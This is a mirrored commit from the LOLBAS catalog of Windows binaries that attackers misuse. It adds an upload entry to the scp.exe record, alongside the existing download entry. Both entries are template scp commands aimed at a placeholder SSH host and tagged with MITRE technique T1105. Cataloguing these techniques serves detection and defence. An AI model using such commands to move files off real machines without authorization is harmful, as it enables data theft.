mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 07:18:05 +01:00
Update scp.yml
Added upload functionality
This commit is contained in:
parent
613afe8ef5
commit
354553efa3
@ -12,12 +12,19 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: "scp <ssh-username>@192.168.187.128:<path_of_file_to_download> <path_to_save_file>"
|
||||
Description: Download file with scp.exe from am SSH server
|
||||
Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password as well.
|
||||
Description: Download file with scp.exe from an SSH server
|
||||
Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password for the SSH session.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: "scp <path_of_local_file_to_upload> <ssh-username>@192.168.187.128:<path_to_save_file>"
|
||||
Description: Upload file with scp.exe to an SSH server
|
||||
Usecase: Use scp.exe to Upload file from the local machine to remote SSH server. If needed, you will be asked to submit a password for the SSH session.
|
||||
Category: Upload
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\OpenSSH\scp.exe
|
||||
Detection:
|
||||
|
Loading…
Reference in New Issue
Block a user